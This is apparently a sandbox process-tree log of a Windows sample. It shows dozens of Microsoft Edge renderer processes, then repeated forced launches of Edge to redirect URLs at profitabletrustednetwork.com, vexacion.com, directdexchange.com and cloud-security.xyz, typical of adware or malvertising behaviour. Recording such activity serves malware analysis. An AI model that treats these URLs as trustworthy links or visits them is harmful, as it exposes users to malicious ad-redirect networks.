C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12624 /prefetch:112⤵PID:46316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10292 /prefetch:112⤵PID:7648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=140 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13180 /prefetch:112⤵PID:31316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:112⤵PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13052 /prefetch:112⤵PID:552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13116 /prefetch:112⤵PID:8564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13200 /prefetch:112⤵PID:3312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8364 /prefetch:112⤵PID:9132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=146 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13048 /prefetch:112⤵PID:9108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=147 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13552 /prefetch:112⤵PID:10440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=148 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12644 /prefetch:112⤵PID:49656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=149 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12464 /prefetch:112⤵PID:11520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=150 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13108 /prefetch:112⤵PID:10052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=151 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13536 /prefetch:112⤵PID:10588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13868 /prefetch:112⤵PID:9508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13892 /prefetch:112⤵PID:1588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=154 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13216 /prefetch:112⤵PID:4252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=155 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13600 /prefetch:112⤵PID:8396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=156 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13128 /prefetch:112⤵PID:6256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=157 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13068 /prefetch:112⤵PID:10400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=158 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13480 /prefetch:112⤵PID:49380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=159 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13780 /prefetch:112⤵PID:33948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:112⤵PID:9696
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵PID:6636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:6148
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵PID:35172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:35236
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵PID:37804
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:37952
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵PID:40108
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:40208
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵PID:42148
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:42220
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵PID:47660
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:47764
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵PID:44504
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:44560
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵PID:11940
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:11988
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968011⤵PID:13684
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:13772
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=311⤵PID:16588
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:16660
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317811⤵PID:20128
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:20208
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46511⤵PID:22284
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:22312
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46611⤵PID:25312
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:25376
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵PID:48624
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:23696
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵PID:7844
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xf0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:5148
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵PID:28976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:10000
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵PID:33612
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:33288
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵PID:34208
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵PID:36204
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵PID:37640
-
